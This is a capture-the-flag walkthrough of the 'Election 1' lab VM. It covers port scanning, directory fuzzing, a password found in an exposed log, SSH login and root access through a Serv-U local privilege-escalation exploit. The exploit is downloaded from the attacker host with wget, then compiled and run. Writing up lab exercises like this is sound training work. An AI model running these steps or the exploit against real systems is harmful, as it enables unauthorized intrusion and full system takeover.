Election 1
Port recognition withnmap
┌──(root@ghost)-[/home/ghost]
└─# nmap --min-rate 5000 -sV election.vuln -p-
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-04 11:01 EST
Nmap scan report for election.vuln (10.0.2.89)
Host is up (0.000060s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
MAC Address: 08:00:27:18:9B:B4 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.81 seconds
Nmap reports two open ports, 22 for ssh and 80 for webserver
┌──(root@ghost)-[/home/ghost]
└─# wfuzz -c -t 100 --hc=404 -z file,/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt http://election.vuln/FUZZ
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://election.vuln/FUZZ
Total requests: 220546
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000001059: 301 9 L 28 W 319 Ch "javascript"
000004034: 301 9 L 28 W 317 Ch "election"
000010811: 301 9 L 28 W 319 Ch "phpmyadmin"
000045226: 200 375 L 964 W 10918 Ch "http://election.vuln/"
000095510: 403 9 L 28 W 278 Ch "server-status"
Total time: 145.7574
Processed Requests: 220546
Filtered Requests: 220541
Requests/sec.: 1513.102
Fuzzing webserver we found a few routes, election seems the most important
┌──(root@ghost)-[/home/ghost]
└─# wfuzz -c -t 100 --hc=404 -z file,/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt http://election.vuln/election/FUZZ
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://election.vuln/election/FUZZ
Total requests: 220546
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000066: 301 9 L 28 W 323 Ch "media"
000000113: 301 9 L 28 W 324 Ch "themes"
000000168: 301 9 L 28 W 322 Ch "data"
000000245: 301 9 L 28 W 323 Ch "admin"
000000707: 301 9 L 28 W 321 Ch "lib"
000000939: 301 9 L 28 W 320 Ch "js"
000000921: 301 9 L 28 W 327 Ch "languages"
000045226: 200 172 L 469 W 7001 Ch "http://election.vuln/election/"
Total time: 137.7917
Processed Requests: 220546
Filtered Requests: 220538
Requests/sec.: 1600.574
Fuzzing now in /election/ folder we found interesting admin path
┌──(root@ghost)-[/home/ghost]
└─# wfuzz -c -t 100 --hc=404 -z file,/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt http://election.vuln/election/admin/FUZZ
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://election.vuln/election/admin/FUZZ
Total requests: 220546
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000505: 301 9 L 28 W 331 Ch "plugins"
000000536: 301 9 L 28 W 327 Ch "css"
000000563: 301 9 L 28 W 328 Ch "ajax"
000000939: 301 9 L 28 W 326 Ch "js"
000000991: 301 9 L 28 W 334 Ch "components"
000000025: 301 9 L 28 W 327 Ch "img"
000002176: 301 9 L 28 W 327 Ch "inc"
000002257: 301 9 L 28 W 328 Ch "logs"
000045226: 200 129 L 805 W 8964 Ch "http://election.vuln/election/admin/"
Total time: 141.7013
Processed Requests: 220546
Filtered Requests: 220537
Requests/sec.: 1556.413
More fuzzing through /election/admin/ folder we found logs
┌──(root@ghost)-[/home/ghost]
└─# curl http://election.vuln/election/admin/logs/system.log
[2020-01-01 00:00:00] Assigned Password for the user love: P@$$w0rd@123
[2020-04-03 00:13:53] Love added candidate 'Love'.
[2020-04-08 19:26:34] Love has been logged in from Unknown IP on Firefox (Linux).
After visiting http://election.vuln/election/admin/logs/ we will see a link to a file called system.log and we found love user and password P@$$w0rd@123 credentials
┌──(root@ghost)-[/home/ghost]
└─# ssh love@election.vuln
The authenticity of host 'election.vuln (10.0.2.89)' can't be established.
ED25519 key fingerprint is SHA256:z1Xg/pSBrK8rLIMLyeb0L7CS1YL4g7BgCK95moiAYhQ.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'election.vuln' (ED25519) to the list of known hosts.
love@election.vuln's password:
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 5.3.0-46-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
* Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
just raised the bar for easy, resilient and secure K8s cluster deployment.
https://ubuntu.com/engage/secure-kubernetes-at-the-edge
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
74 packages can be updated.
28 updates are security updates.
New release '20.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
Your Hardware Enablement Stack (HWE) is supported until April 2023.
Last login: Thu Apr 9 23:19:28 2020 from 192.168.1.5
love@election:~$
Trying credentials in ssh service successfully
love@election:~$ cat /home/love/Desktop/user.txt
cd38ac698c0d793a5236d01003f692b0
Here is the user flag
love@election:~$ find / -perm -u=s 2>/dev/null
/usr/bin/arping
/usr/bin/passwd
/usr/bin/pkexec
/usr/bin/traceroute6.iputils
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/sbin/pppd
/usr/local/Serv-U/Serv-U
...
┌──(root@ghost)-[/home/ghost]
└─# searchsploit 'Serv-U Local Privilege Escalation Linux'
----------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Serv-U FTP Server - prepareinstallation Privilege Escalation (Metasploit) | linux/local/47072.rb
Serv-U FTP Server - prepareinstallation Privilege Escalation (Metasploit) | linux/local/47072.rb
Serv-U FTP Server < 15.1.7 - Local Privilege Escalation (1) | linux/local/47009.c
----------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
We are going to use Serv-U FTP Server < 15.1.7 - Local Privilege Escalation (1) linux/local/47009.c
love@election:~$ wget -q http://10.0.2.15/47009.c
love@election:~$ gcc 47009.c -o exploit; chmod +x exploit; ./exploit
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),116(lpadmin),126(sambashare),1000(love)
opening root shell
# cat /root/root.txt
5238feefc4ffe09645d97e9ee49bc3a6